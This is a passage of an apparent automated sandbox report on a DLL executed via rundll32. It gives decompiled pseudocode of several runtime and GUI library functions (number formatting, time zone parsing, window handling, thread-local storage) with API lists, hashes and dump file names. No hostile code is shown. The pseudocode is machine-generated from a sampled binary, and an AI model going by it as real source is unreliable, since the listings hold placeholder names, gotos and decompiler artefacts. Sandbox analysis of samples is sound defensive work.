									_t74 =  &_a12;
									 *_t74 = _a12 - 1;
									__eflags =  *_t74;
									 *_v52 = _v9 + 0x30;
									_v9 = 0;
								} while ( *_t74 != 0);
								_t99 = _v52;
							}
							_t100 = _t99 - 1;
							_t101 = _t100 - 1;
							__eflags =  *_t100 - 0x35;
							_t141 =  &(_t131[2]);
							if( *_t100 < 0x35) {
								while(1) {
									__eflags = _t101 - _t141;
									if(_t101 < _t141) {
										break;
									}
									__eflags =  *_t101 - 0x30;
									if( *_t101 == 0x30) {
										_t101 = _t101 - 1;
										__eflags = _t101;
										continue;
									}
									break;
								}
								__eflags = _t101 - _t141;
								if(_t101 >= _t141) {
									goto L46;
								} else {
									 *_t141 = 0x30;
									goto L54;
								}
							} else {
								while(1) {
									__eflags = _t101 - _t141;
									if(_t101 < _t141) {
										break;
									}
									__eflags =  *_t101 - 0x39;
									if( *_t101 == 0x39) {
										 *_t101 = 0x30;
										_t101 = _t101 - 1;
										__eflags = _t101;
										continue;
									}
									break;
								}
								__eflags = _t101 - _t141;
								if(_t101 < _t141) {
									_t101 = _t101 + 1;
									 *_t131 =  *_t131 + 1;
									__eflags =  *_t131;
								}
								 *_t101 =  *_t101 + 1;
								__eflags =  *_t101;
								L46:
								_t103 = _t101 - _t131 - 3;
								__eflags = _t103;
								_t131[1] = _t103;
								 *((char*)( &(_t131[2]) + _t103)) = 0;
								goto L47;
							}
						} else {
							_t152 = _t152 + _t159;
							__eflags = _t152;
							if(_t152 > 0) {
								goto L27;
							} else {
								goto L26;
							}
						}
					} else {
						 *_t131 = 1;
						if(_t151 != 0x80000000 || _a4 != 0) {
							if((_t151 & 0x40000000) != 0) {
								goto L11;
							} else {
								_push("1#SNAN");
								goto L21;
							}
						} else {
							L11:
							__eflags = _t133;
							if(_t133 == 0) {
								L15:
								__eflags = _t151 - 0x80000000;
								if(_t151 != 0x80000000) {
									goto L20;
								} else {
									__eflags = _a4;
									if(_a4 != 0) {
										goto L20;
									} else {
										_push("1#INF");
										goto L18;
									}
								}
							} else {
								__eflags = _t151 - 0xc0000000;
								if(_t151 != 0xc0000000) {
									goto L15;
								} else {
									__eflags = _a4;
									if(_a4 != 0) {
										L20:
										_push("1#QNAN");
										L21:
										_push( &(_t131[2]));
										E10017B90();
										_t131[1] = 6;
									} else {
										_push("1#IND");
										L18:
										_push( &(_t131[2]));
										E10017B90();
										_t131[1] = 5;
									}
								}
							}
						}
						_v48 = _v48 & 0x00000000;
						L47:
						_t105 = _v48;
					}
				} else {
					L26:
					_t131[2] = 0x30;
					L54:
					 *_t131 =  *_t131 & 0x00000000;
					_t131[1] = 0x20;
					_t131[1] = 1;
					_t131[2] = 0;
					_t105 = 1;
				}
				return E100117AE(_t105, _v8);
			}

APIs

___shr_12.LIBCMT ref: 1001BDF8

Strings

1#SNAN, xrefs: 1001BCDE
1#IND, xrefs: 1001BCF8
1#QNAN, xrefs: 1001BD26
1#INF, xrefs: 1001BD09
?, xrefs: 1001BC8F

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ___shr_12
String ID: 1#IND$1#INF$1#QNAN$1#SNAN$?
API String ID: 2664560246-4131533671
Opcode ID: 41872633d6340cc6f23dba41c7221c5f3b32f20f70e5c2c0d702b1f865941683
Instruction ID: 0f4b10661b4c6afdc81634f06d58437e80c3cbb5605fe3a4bfa1b348def2c0f3
Opcode Fuzzy Hash: 41872633d6340cc6f23dba41c7221c5f3b32f20f70e5c2c0d702b1f865941683
Instruction Fuzzy Hash: 47810232804A9ACECF01CB68C8847EEBBF4EF15354F0545AAE850DF282E774D685C3A1

Uniqueness

Uniqueness Score: -1.00%

Function 10018E14 Relevance: 10.7, APIs: 7, Instructions: 212
timeCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10018E14(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t21;
				long _t22;
				char* _t24;
				signed int _t26;
				signed int _t27;
				int _t29;
				char* _t30;
				int _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				int _t36;
				int _t39;
				int _t41;
				int _t44;
				char* _t48;
				signed int _t49;
				void* _t51;
				int _t52;
				signed int _t54;
				void* _t56;
				void* _t58;
				int _t60;
				int _t63;
				void* _t75;
				void* _t76;
				void* _t77;
				signed int _t82;
				char* _t87;
				int _t89;
				void* _t90;

				_push(0x18);
				_push(0x10042cd0);
				E10012514(__ebx, __edi, __esi);
				 *(_t90 - 0x20) = 0;
				E10013A38(__ebx, 0, 7);
				 *(_t90 - 4) = 0;
				_t63 =  *0x1004f734; // 0x0
				 *(_t90 - 0x28) = _t63;
				 *0x1004f814 = 0;
				 *0x1004ce8c =  *0x1004ce8c | 0xffffffff;
				 *0x1004ce80 =  *0x1004ce80 | 0xffffffff;
				_t87 = E1001ADE6(0x10042ccc);
				 *((intOrPtr*)(_t90 - 0x24)) = _t87;
				if(_t87 == 0 ||  *_t87 == 0) {
					_t21 =  *0x1004f818; // 0x0
					__eflags = _t21;
					if(__eflags != 0) {
						_push(_t21);
						E100107C8(_t63, 0, _t87, __eflags);
						 *0x1004f818 = 0;
					}
					_t22 = GetTimeZoneInformation(0x1004f768);
					__eflags = _t22 - 0xffffffff;
					if(_t22 == 0xffffffff) {
						goto L31;
					} else {
						 *0x1004f814 = 1;
						_t26 = 0x1004f768->Bias; // 0x0
						_t27 = _t26 * 0x3c;
						 *0x1004cde8 = _t27;
						__eflags =  *0x1004f7ae; // 0x0
						if(__eflags != 0) {
							_t82 =  *0x1004f7bc; // 0x0
							_t39 = _t27 + _t82 * 0x3c;
							__eflags = _t39;
							 *0x1004cde8 = _t39;
						}
						__eflags =  *0x1004f802; // 0x0
						if(__eflags == 0) {
							L22:
							 *0x1004cdec = 0;
							 *0x1004cdf0 = 0;
							goto L23;
						} else {
							_t36 =  *0x1004f810; // 0x0
							__eflags = _t36;
							if(_t36 == 0) {
								goto L22;
							}
							 *0x1004cdec = 1;
							 *0x1004cdf0 = (_t36 -  *0x1004f7bc) * 0x3c;
							L23:
							_t29 = WideCharToMultiByte(_t63, 0, 0x1004f76c, 0xffffffff,  *0x1004ce78, 0x3f, 0, _t90 - 0x1c);
							__eflags = _t29;
							if(_t29 == 0) {
								L26:
								_t30 =  *0x1004ce78; // 0x1004cdf8
								 *_t30 = 0;
								L27:
								_t32 = WideCharToMultiByte(_t63, 0, 0x1004f7c0, 0xffffffff,  *0x1004ce7c, 0x3f, 0, _t90 - 0x1c);
								__eflags = _t32;
								if(_t32 == 0) {
									L30:
									_t33 =  *0x1004ce7c; // 0x1004ce38
									 *_t33 = 0;
									goto L31;
								}
								__eflags =  *(_t90 - 0x1c);
								if( *(_t90 - 0x1c) != 0) {
									goto L30;
								}
								_t34 =  *0x1004ce7c; // 0x1004ce38
								_t34[0x3f] = 0;
								goto L31;
							}
							__eflags =  *(_t90 - 0x1c);
							if( *(_t90 - 0x1c) != 0) {
								goto L26;
							}
							_t35 =  *0x1004ce78; // 0x1004cdf8
							_t35[0x3f] = 0;
							goto L27;
						}
					}
				} else {
					_t41 =  *0x1004f818; // 0x0
					if(_t41 == 0) {
						L6:
						_t44 = E100107B6(E10011820(_t87) + 1);
						 *0x1004f818 = _t44;
						if(_t44 == 0) {
							L31:
							_t24 = E1001095E(_t90 - 0x10, 0xffffffff);
							L47:
							return E1001254F(_t24);
						}
						E10017B90(_t44, _t87);
						_pop(_t75);
						 *(_t90 - 4) =  *(_t90 - 4) | 0xffffffff;
						E1001902F();
						E10019E20( *0x1004ce78, _t87, 3);
						_t48 =  *0x1004ce78; // 0x1004cdf8
						_t48[3] = 0;
						_t89 = _t87 + 3;
						if( *_t89 == 0x2d) {
							 *(_t90 - 0x20) = 1;
							_t89 = _t89 + 1;
						}
						_t49 = E10012749(_t63, _t75, _t90, _t89);
						_pop(_t76);
						 *0x1004cde8 = _t49 * 0xe10;
						while(1) {
							_t51 =  *_t89;
							if(_t51 != 0x2b && (_t51 < 0x30 || _t51 > 0x39)) {
								break;
							}
							_t89 = _t89 + 1;
						}
						__eflags =  *_t89 - 0x3a;
						if( *_t89 != 0x3a) {
							L42:
							__eflags =  *(_t90 - 0x20);
							if( *(_t90 - 0x20) != 0) {
								 *0x1004cde8 =  ~( *0x1004cde8);
							}
							_t52 =  *_t89;
							 *0x1004cdec = _t52;
							__eflags = _t52;
							if(_t52 == 0) {
								_t24 =  *0x1004ce7c; // 0x1004ce38
								 *_t24 = 0;
							} else {
								E10019E20( *0x1004ce7c, _t89, 3);
								_t24 =  *0x1004ce7c; // 0x1004ce38
								_t24[3] = 0;
							}
							goto L47;
						}
						_t89 = _t89 + 1;
						_t54 = E10012749(0x30, _t76, _t90, _t89);
						_pop(_t77);
						 *0x1004cde8 =  *0x1004cde8 + _t54 * 0x3c;
						while(1) {
							_t56 =  *_t89;
							__eflags = _t56 - 0x30;
							if(_t56 < 0x30) {
								break;
							}
							__eflags = _t56 - 0x39;
							if(_t56 > 0x39) {
								break;
							}
							_t89 = _t89 + 1;
							__eflags = _t89;
						}
						__eflags =  *_t89 - 0x3a;
						if( *_t89 != 0x3a) {
							goto L42;
						}
						_t89 = _t89 + 1;
						 *0x1004cde8 =  *0x1004cde8 + E10012749(0x30, _t77, _t90, _t89);
						while(1) {
							_t58 =  *_t89;
							__eflags = _t58 - 0x30;
							if(_t58 < 0x30) {
								goto L42;
							}
							__eflags = _t58 - 0x39;
							if(_t58 > 0x39) {
								goto L42;
							}
							_t89 = _t89 + 1;
							__eflags = _t89;
						}
						goto L42;
					}
					if(E10016D00(_t87, _t41) == 0) {
						goto L31;
					} else {
						_t60 =  *0x1004f818; // 0x0
						_t99 = _t60;
						if(_t60 != 0) {
							_push(_t60);
							E100107C8(_t63, 0, _t87, _t99);
						}
						goto L6;
					}
				}
			}

APIs

__lock.LIBCMT ref: 10018E27

Part of subcall function 10013A38: EnterCriticalSection.KERNEL32(?,?,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?), ref: 10013A60

_strlen.LIBCMT ref: 10018E99
_strncpy.LIBCMT ref: 10018ECF

Part of subcall function 100107C8: __lock.LIBCMT ref: 100107E6
Part of subcall function 100107C8: RtlFreeHeap.NTDLL(00000000,?,10041D10,0000000C,10013A1C,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010), ref: 1001082D

GetTimeZoneInformation.KERNEL32(1004F768,10042CD0,00000018,10019429,10042CE0,00000008,10013474,?,?,0000003C,00000000,?,?,0000003C,00000000,?), ref: 10018F38
WideCharToMultiByte.KERNEL32(00000000,00000000,1004F76C,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,00000001), ref: 10018FC6
WideCharToMultiByte.KERNEL32(00000000,00000000,1004F7C0,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,00000001), ref: 10018FFA

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ByteCharMultiWide__lock$CriticalEnterFreeHeapInformationSectionTimeZone_strlen_strncpy
String ID:
API String ID: 634650903-0
Opcode ID: a9bae9aefb51bf9dcb25716141066ca3c4119656b85ae577e9b21111d529fdd4
Instruction ID: 7381ce5ac415a33791fc082bffc14b542c5be3190c63e6ff879a0c337f862410
Opcode Fuzzy Hash: a9bae9aefb51bf9dcb25716141066ca3c4119656b85ae577e9b21111d529fdd4
Instruction Fuzzy Hash: F871F6308046659EF751CB299E85E593FE9EB4B360F20422EE490DF2E1D770DAC2CB59

Uniqueness

Uniqueness Score: -1.00%

Function 1002DA8D Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E1002DA8D(intOrPtr __ecx, void* __edx) {
				void* __esi;
				void* __ebp;
				intOrPtr _t60;
				signed char _t65;
				signed int _t70;
				signed int _t71;
				intOrPtr _t109;
				signed int _t115;
				signed int _t117;
				void* _t133;
				void* _t135;
				intOrPtr _t140;
				void* _t143;
				void* _t145;

				_t133 = __edx;
				_t143 = _t145 - 0xa8;
				_t60 =  *0x1004c470; // 0x12db9c4b
				_t140 =  *((intOrPtr*)(_t143 + 0xb0));
				 *((intOrPtr*)(_t143 + 0xa4)) = _t60;
				_t109 = __ecx;
				_t62 = GetWindowRect( *(_t140 + 0x1c), _t143 - 0x80);
				if( *((intOrPtr*)(_t140 + 0x88)) != _t109 ||  *(_t143 + 0xb4) != 0 && EqualRect(_t143 - 0x80,  *(_t143 + 0xb4)) == 0) {
					if( *((intOrPtr*)(_t109 + 0x90)) != 0 && ( *(_t140 + 0x80) & 0x00000040) != 0) {
						 *(_t109 + 0x7c) =  *(_t109 + 0x7c) | 0x00000040;
					}
					 *(_t109 + 0x7c) =  *(_t109 + 0x7c) & 0xfffffff9;
					_t65 =  *(_t140 + 0x7c) & 0x00000006 |  *(_t109 + 0x7c);
					 *(_t109 + 0x7c) = _t65;
					if((_t65 & 0x00000040) == 0) {
						_push(0x104);
						_push(_t143 - 0x60);
						E1002095F(_t140);
						E10029B23(_t140,  *((intOrPtr*)(_t109 + 0x1c)), _t143 - 0x60);
					}
					_t70 = ( *(_t140 + 0x7c) ^  *(_t109 + 0x7c)) & 0x0000f000 ^  *(_t140 + 0x7c) | 0x00000f00;
					if( *((intOrPtr*)(_t109 + 0x90)) == 0) {
						_t71 = _t70 & 0xfffffffe;
					} else {
						_t71 = _t70 | 0x00000001;
					}
					E100383D0(_t140, _t71);
					_push(0xffffffff);
					_t135 = E1002CDCE(_t109, GetDlgCtrlID( *(_t140 + 0x1c)) & 0x0000ffff);
					if(_t135 > 0) {
						 *((intOrPtr*)(E100086F2(_t109 + 0x94, _t135))) = _t140;
					}
					if( *(_t143 + 0xb4) == 0) {
						if(_t135 < 1) {
							_t137 = _t109 + 0x94;
							E1001E2BE(_t109 + 0x94, _t143,  *((intOrPtr*)(_t109 + 0x9c)), _t140);
							E1001E2BE(_t137, _t143,  *((intOrPtr*)(_t137 + 8)), 0);
						}
						_t115 =  *0x1004efa4; // 0x2
						_push(0x115);
						_push(0);
						_push(0);
						_push( ~_t115);
						_t117 =  *0x1004efa0; // 0x2
						_push( ~_t117);
						_push(0);
					} else {
						CopyRect(_t143 - 0x70,  *(_t143 + 0xb4));
						E10028E5A(_t109, _t143 - 0x70);
						if(_t135 < 1) {
							asm("cdq");
							asm("cdq");
							_push(( *((intOrPtr*)(_t143 - 0x64)) -  *((intOrPtr*)(_t143 - 0x6c)) - _t133 >> 1) +  *((intOrPtr*)(_t143 - 0x6c)));
							_push(( *((intOrPtr*)(_t143 - 0x68)) -  *(_t143 - 0x70) - _t133 >> 1) +  *(_t143 - 0x70));
							_push( *((intOrPtr*)(_t143 + 0xb0)));
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							E1002CE2A(_t109);
							_t140 =  *((intOrPtr*)(_t143 + 0xb0));
						}
						_push(0x114);
						_push( *((intOrPtr*)(_t143 - 0x64)) -  *((intOrPtr*)(_t143 - 0x6c)));
						_push( *((intOrPtr*)(_t143 - 0x68)) -  *(_t143 - 0x70));
						_push( *((intOrPtr*)(_t143 - 0x6c)));
						_push( *(_t143 - 0x70));
						_push(0);
					}
					E100204FE(_t140);
					if(E100220EE(_t143, GetParent( *(_t140 + 0x1c))) != _t109) {
						E1000870E(_t140, _t109);
					}
					_t120 =  *((intOrPtr*)(_t140 + 0x88));
					if( *((intOrPtr*)(_t140 + 0x88)) != 0) {
						E1002D1B2(_t120, _t140, 0xffffffff, 0);
					}
					 *((intOrPtr*)(_t140 + 0x88)) = _t109;
					 *(E100314D8(_t109) + 0xcc) =  *(_t62 + 0xcc) | 0x0000000c;
				}
				return E100117AE(_t62,  *((intOrPtr*)(_t143 + 0xa4)));
			}

APIs

GetWindowRect.USER32 ref: 1002DAB8
EqualRect.USER32 ref: 1002DADD
GetDlgCtrlID.USER32 ref: 1002DB64
CopyRect.USER32 ref: 1002DB9C
GetParent.USER32(?), ref: 1002DC56

Strings

@, xrefs: 1002DAFD

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Rect$CopyCtrlEqualParentWindow
String ID: @
API String ID: 2544134605-2766056989
Opcode ID: c20e828919207d0164ea6c25dc37f68ea2733143114ea03cae4a2a36553e5d5a
Instruction ID: b45b6ef3e14a7e4d87b63386d5d067ae84193d18a4a25c559dd4ceadf4ed8576
Opcode Fuzzy Hash: c20e828919207d0164ea6c25dc37f68ea2733143114ea03cae4a2a36553e5d5a
Instruction Fuzzy Hash: E651BA716006499FDF25DF68DC95BAE77AAFF44300F504529E91ADB1A2CB30AD05CB10

Uniqueness

Uniqueness Score: -1.00%

Function 10021B92 Relevance: 10.6, APIs: 7, Instructions: 115
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E10021B92(intOrPtr* __ecx, signed int _a4) {
				struct HWND__* _v4;
				struct tagMSG* _v8;
				int _v12;
				int _v16;
				struct HWND__* _t42;
				signed int _t45;
				int _t53;
				long _t56;
				int _t62;
				intOrPtr* _t69;

				_t62 = 1;
				_t69 = __ecx;
				_v12 = 1;
				_v16 = 0;
				if((_a4 & 0x00000004) == 0 || (E100202AB(__ecx) & 0x10000000) != 0) {
					_t62 = 0;
				}
				_t42 = GetParent( *(_t69 + 0x1c));
				 *(_t69 + 0x38) =  *(_t69 + 0x38) | 0x00000018;
				_v4 = _t42;
				_v8 = E1001F7B7();
				L14:
				while(1) {
					L14:
					while(_v12 != 0) {
						if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
							while(1) {
								L15:
								_t45 = E1001FABB();
								if(_t45 == 0) {
									break;
								}
								if(_t62 != 0) {
									_t53 = _v8->message;
									if(_t53 == 0x118 || _t53 == 0x104) {
										E100203AD(_t69, 1);
										UpdateWindow( *(_t69 + 0x1c));
										_t62 = 0;
									}
								}
								if( *((intOrPtr*)( *_t69 + 0x80))() == 0) {
									 *(_t69 + 0x38) =  *(_t69 + 0x38) & 0xffffffe7;
									return  *((intOrPtr*)(_t69 + 0x40));
								} else {
									if(E1001FA27(_v8) != 0) {
										_v12 = 1;
										_v16 = 0;
									}
									if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
										continue;
									} else {
										goto L14;
									}
								}
							}
							_push(0);
							E1003A098();
							return _t45 | 0xffffffff;
						}
						if(_t62 != 0) {
							E100203AD(_t69, 1);
							UpdateWindow( *(_t69 + 0x1c));
							_t62 = 0;
						}
						if((_a4 & 0x00000001) == 0 && _v4 != 0 && _v16 == 0) {
							SendMessageA(_v4, 0x121, 0,  *(_t69 + 0x1c));
						}
						if((_a4 & 0x00000002) != 0) {
							L13:
							_v12 = 0;
							continue;
						} else {
							_t56 = SendMessageA( *(_t69 + 0x1c), 0x36a, 0, _v16);
							_v16 = _v16 + 1;
							if(_t56 != 0) {
								continue;
							}
							goto L13;
						}
					}
					goto L15;
				}
			}

APIs

GetParent.USER32(?), ref: 10021BC0
PeekMessageA.USER32 ref: 10021BE7
UpdateWindow.USER32(?), ref: 10021C01
SendMessageA.USER32 ref: 10021C25
SendMessageA.USER32 ref: 10021C3F
UpdateWindow.USER32(?), ref: 10021C85
PeekMessageA.USER32 ref: 10021CB9

Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 5ee4d89bd6c594df32917749107b3ff340b5b4dd3c4e0b0819ec5134911ec0b1
Instruction ID: 572a0072a054787b928fb31f1bd515718dba8d5f307fe0ba771f0ec6dbe0ec5d
Opcode Fuzzy Hash: 5ee4d89bd6c594df32917749107b3ff340b5b4dd3c4e0b0819ec5134911ec0b1
Instruction Fuzzy Hash: AC41D4382047419FD722CF22AC88E5BBAF5FFD1794FA0092DF881951A1D732E945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 10037732 Relevance: 10.6, APIs: 7, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E10037732(long* __ecx, signed int _a4, intOrPtr _a8) {
				struct _CRITICAL_SECTION* _v8;
				void* __ebp;
				void* _t32;
				void* _t36;
				void* _t37;
				signed int _t52;
				long* _t59;
				struct _CRITICAL_SECTION* _t62;
				void* _t64;

				_push(__ecx);
				_t59 = __ecx;
				_t1 =  &(_t59[7]); // 0x1004f010
				_t62 = _t1;
				_v8 = _t62;
				EnterCriticalSection(_t62);
				_t32 = _a4;
				if(_t32 <= 0) {
					L20:
					LeaveCriticalSection(_t62);
				} else {
					_t4 =  &(_t59[3]); // 0x3
					if(_t32 >=  *_t4) {
						goto L20;
					} else {
						_t64 = TlsGetValue( *_t59);
						if(_t64 == 0) {
							if(E1003741E(0x10) == 0) {
								_t64 = 0;
							} else {
								_t64 = E10037684(_t34);
							}
							 *(_t64 + 8) = 0;
							 *(_t64 + 0xc) = 0;
							_t10 =  &(_t59[5]); // 0x2ad0c78
							_t49 =  *_t10;
							_t11 =  &(_t59[6]); // 0x4
							 *(_t64 +  *_t11) =  *_t10;
							_t59[5] = _t64;
							goto L10;
						} else {
							_t52 = _a4;
							if(_t52 >=  *(_t64 + 8) && _a8 != 0) {
								L10:
								_t36 =  *(_t64 + 0xc);
								if(_t36 != 0) {
									_t16 =  &(_t59[3]); // 0x3
									_t49 =  *_t16 << 2;
									_t37 = LocalReAlloc(_t36,  *_t16 << 2, 2);
								} else {
									_t15 =  &(_t59[3]); // 0x3
									_t37 = LocalAlloc(0,  *_t15 << 2);
								}
								if(_t37 == 0) {
									LeaveCriticalSection(_v8);
									_t37 = E1001CE3B(_t49);
								}
								 *(_t64 + 0xc) = _t37;
								_t20 =  &(_t59[3]); // 0x3
								E10011C50(_t37 +  *(_t64 + 8) * 4, 0,  *_t20 -  *(_t64 + 8) << 2);
								_t23 =  &(_t59[3]); // 0x3
								 *(_t64 + 8) =  *_t23;
								TlsSetValue( *_t59, _t64);
								_t52 = _a4;
							}
						}
						_t32 =  *(_t64 + 0xc);
						if(_t32 != 0 && _t52 <  *(_t64 + 8)) {
							 *((intOrPtr*)(_t32 + _t52 * 4)) = _a8;
						}
						LeaveCriticalSection(_v8);
					}
				}
				return _t32;
			}

APIs

EnterCriticalSection.KERNEL32(1004F010,00000000,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 10037742
TlsGetValue.KERNEL32(1004EFF4,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 10037760
LocalAlloc.KERNEL32(00000000,00000003,00000010,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD), ref: 100377BC
LocalReAlloc.KERNEL32(?,00000003,00000002,00000010,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4), ref: 100377CE
LeaveCriticalSection.KERNEL32(?,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 100377DB
TlsSetValue.KERNEL32(1004EFF4,00000000), ref: 1003780B
LeaveCriticalSection.KERNEL32(1004F010,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 1003782C

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$AllocLeaveLocalValue$Enter
String ID:
API String ID: 784703316-0
Opcode ID: 08160d687b4238578b6b11cb7633d7b3c48d72cf3f7efa0c267663df606f3a02
Instruction ID: 1d31c533a979c77301d76d8eb0d2db078f0d9c8120d6b2d843174624ed3e927a
Opcode Fuzzy Hash: 08160d687b4238578b6b11cb7633d7b3c48d72cf3f7efa0c267663df606f3a02
Instruction Fuzzy Hash: F8317C75600615AFD726DF59C8C8C5ABBE5FF08352B11C929E81ADB611CB30FC50CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000F6EA Relevance: 10.6, APIs: 7, Instructions: 86
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E1000F6EA(void* __ebx, void* __ecx) {
				void* __ebp;
				void* _t28;
				void* _t36;
				signed char _t37;
				intOrPtr _t41;
				void* _t42;
				void* _t44;
				intOrPtr _t45;
				void* _t46;

				_t39 = __ecx;
				_t36 = __ebx;
				_t41 =  *((intOrPtr*)(_t46 + 0x10));
				if(_t41 == 0) {
					_t45 =  *((intOrPtr*)(_t46 + 0x10));
					L14:
					_t42 = E100220EE(_t45, GetTopWindow( *(_t45 + 0x1c)));
					if(_t42 != 0) {
						L7:
						if((GetWindowLongA( *(_t42 + 0x1c), 0xffffffec) & 0x00010000) == 0) {
							L18:
							return _t42;
						}
						_push(_t36);
						_t37 =  *(_t46 + 0x1c);
						if((_t37 & 0x00000001) == 0 || IsWindowVisible( *(_t42 + 0x1c)) != 0) {
							if((_t37 & 0x00000002) == 0) {
								L16:
								_push(_t37);
								_push(0);
								_push(_t42);
								goto L17;
							}
							_t39 = _t42;
							if(E100203CE(_t42) != 0) {
								goto L16;
							}
							goto L12;
						} else {
							L12:
							_push(_t37);
							_push(_t42);
							_push(_t45);
							L17:
							_t42 = E1000F6EA(_t37, _t39);
							goto L18;
						}
					}
					return _t45;
				}
				_t28 = E100220EE(_t44, GetWindow( *(_t41 + 0x1c), 2));
				_t45 =  *((intOrPtr*)(_t46 + 0x10));
				while(_t28 == 0) {
					_t41 = E1000F695(_t45, E100220EE(_t45, GetParent( *(_t41 + 0x1c))));
					if(_t41 == 0 || _t41 == _t45) {
						goto L14;
					} else {
						_t28 = E100220EE(_t45, GetWindow( *(_t41 + 0x1c), 2));
						continue;
					}
				}
				_t42 = E100220EE(_t45, GetWindow( *(_t41 + 0x1c), 2));
				goto L7;
			}

APIs

GetWindow.USER32(?,00000002), ref: 1000F705
GetParent.USER32(?), ref: 1000F716
GetWindow.USER32(?,00000002), ref: 1000F739
GetWindow.USER32(?,00000002), ref: 1000F74B
GetWindowLongA.USER32 ref: 1000F75A
IsWindowVisible.USER32 ref: 1000F774
GetTopWindow.USER32(?), ref: 1000F79A

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
